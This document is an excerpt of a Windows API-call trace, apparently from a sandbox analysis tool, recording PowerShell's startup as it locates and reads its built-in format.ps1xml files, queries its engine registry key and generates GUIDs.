	[0282.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0282.317] SetErrorMode (uMode=0x1) returned 0x1
	[0282.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.317] SetErrorMode (uMode=0x1) returned 0x1
	[0282.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0282.317] SetErrorMode (uMode=0x1) returned 0x1
	[0282.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0282.317] SetErrorMode (uMode=0x1) returned 0x1
	[0282.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0282.318] SetErrorMode (uMode=0x1) returned 0x1
	[0282.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.318] SetErrorMode (uMode=0x1) returned 0x1
	[0282.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0282.318] SetErrorMode (uMode=0x1) returned 0x1
	[0282.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.318] SetErrorMode (uMode=0x1) returned 0x1
	[0282.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0282.318] SetErrorMode (uMode=0x1) returned 0x1
	[0282.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0282.319] SetErrorMode (uMode=0x1) returned 0x1
	[0282.319] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0282.319] SetErrorMode (uMode=0x1) returned 0x1
	[0282.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0282.319] SetErrorMode (uMode=0x1) returned 0x1
	[0282.319] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0282.319] SetErrorMode (uMode=0x1) returned 0x1
	[0282.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0282.320] SetErrorMode (uMode=0x1) returned 0x1
	[0282.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0282.320] SetErrorMode (uMode=0x1) returned 0x1
	[0282.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0282.320] SetErrorMode (uMode=0x1) returned 0x1
	[0282.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0282.320] SetErrorMode (uMode=0x1) returned 0x1
	[0282.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0282.321] SetErrorMode (uMode=0x1) returned 0x1
	[0282.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5c0 | out: lpFileInformation=0x12d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0282.321] SetErrorMode (uMode=0x1) returned 0x1
	[0282.321] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0282.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.321] CoTaskMemFree (pv=0x389720) 
	[0282.331] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0282.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.332] CoTaskMemFree (pv=0x389720) 
	[0282.332] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0282.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.332] CoTaskMemFree (pv=0x389720) 
	[0282.333] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0282.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.333] CoTaskMemFree (pv=0x389720) 
	[0282.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.333] SetErrorMode (uMode=0x1) returned 0x1
	[0282.333] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0282.334] GetFileType (hFile=0x304) returned 0x1
	[0282.334] SetErrorMode (uMode=0x1) returned 0x1
	[0282.334] GetFileType (hFile=0x304) returned 0x1
	[0282.334] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.335] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.336] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.336] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.336] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.337] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0282.337] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x9e2, lpOverlapped=0x0) returned 1
	[0282.337] ReadFile (in: hFile=0x304, lpBuffer=0x335c7ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335c7ea*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0282.337] ReadFile (in: hFile=0x304, lpBuffer=0x335d2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x335d2a0*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0282.337] CloseHandle (hObject=0x304) returned 1
	[0282.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.337] SetErrorMode (uMode=0x1) returned 0x1
	[0282.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0282.338] SetErrorMode (uMode=0x1) returned 0x1
	[0282.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.338] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x304) returned 0x0
	[0282.338] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0282.338] CoTaskMemAlloc (cb=0x5a) returned 0x1b904190
	[0282.338] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x1b904190, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0282.338] CoTaskMemFree (pv=0x1b904190) 
	[0282.338] RegCloseKey (hKey=0x304) returned 0x0
	[0282.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0282.345] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x5b7e2df, Data2=0xa3cc, Data3=0x474f, Data4=([0]=0xb6, [1]=0xf4, [2]=0xb9, [3]=0x6c, [4]=0x37, [5]=0xeb, [6]=0xb7, [7]=0x28))) returned 0x0
	[0283.248] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf5d437d6, Data2=0x4daa, Data3=0x458f, Data4=([0]=0xa2, [1]=0x45, [2]=0xc7, [3]=0x21, [4]=0x3f, [5]=0xa8, [6]=0x5a, [7]=0x75))) returned 0x0
	[0283.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0283.251] SetErrorMode (uMode=0x1) returned 0x1
	[0283.251] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0283.251] GetFileType (hFile=0x304) returned 0x1
	[0283.251] SetErrorMode (uMode=0x1) returned 0x1
	[0283.251] GetFileType (hFile=0x304) returned 0x1
	[0283.251] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.253] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.253] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.254] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.254] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0283.255] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0xfb2, lpOverlapped=0x0) returned 1
	[0283.256] ReadFile (in: hFile=0x304, lpBuffer=0x3387522, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387522*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0283.256] ReadFile (in: hFile=0x304, lpBuffer=0x3387e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x3387e08*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0283.256] CloseHandle (hObject=0x304) returned 1
	[0283.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0283.257] SetErrorMode (uMode=0x1) returned 0x1
	[0283.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0283.257] SetErrorMode (uMode=0x1) returned 0x1
	[0283.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0283.257] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x304) returned 0x0
	[0283.257] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0283.258] CoTaskMemAlloc (cb=0x5a) returned 0x1b903f60
	[0283.258] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x1b903f60, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0283.258] CoTaskMemFree (pv=0x1b903f60) 
	[0283.258] RegCloseKey (hKey=0x304) returned 0x0
	[0283.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0283.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0283.261] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x67585b23, Data2=0xc7f6, Data3=0x42c9, Data4=([0]=0xb5, [1]=0x44, [2]=0x57, [3]=0x27, [4]=0x6d, [5]=0x8d, [6]=0xd3, [7]=0x5))) returned 0x0
	[0283.263] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xbd0daa24, Data2=0x45fa, Data3=0x441a, Data4=([0]=0x99, [1]=0x5b, [2]=0x45, [3]=0xa4, [4]=0xb4, [5]=0xca, [6]=0xb0, [7]=0x2d))) returned 0x0
	[0283.264] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x976b821c, Data2=0x55f7, Data3=0x488c, Data4=([0]=0x83, [1]=0x10, [2]=0x17, [3]=0x6b, [4]=0x9, [5]=0x2e, [6]=0x66, [7]=0xff))) returned 0x0
	[0283.264] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x8d4e3ea, Data2=0x1dfc, Data3=0x4e98, Data4=([0]=0xb9, [1]=0x19, [2]=0x27, [3]=0xad, [4]=0xc4, [5]=0x8e, [6]=0xb, [7]=0x3))) returned 0x0
	[0283.264] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x64bbffde, Data2=0x2d0f, Data3=0x48c1, Data4=([0]=0x98, [1]=0xc8, [2]=0x93, [3]=0xa2, [4]=0x4a, [5]=0x30, [6]=0x4f, [7]=0xb5))) returned 0x0
	[0283.265] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x208dfdae, Data2=0x5a5d, Data3=0x40ff, Data4=([0]=0xad, [1]=0xe7, [2]=0x59, [3]=0x9f, [4]=0x7e, [5]=0x93, [6]=0x49, [7]=0x3d))) returned 0x0
	[0283.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.265] SetErrorMode (uMode=0x1) returned 0x1
	[0283.265] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
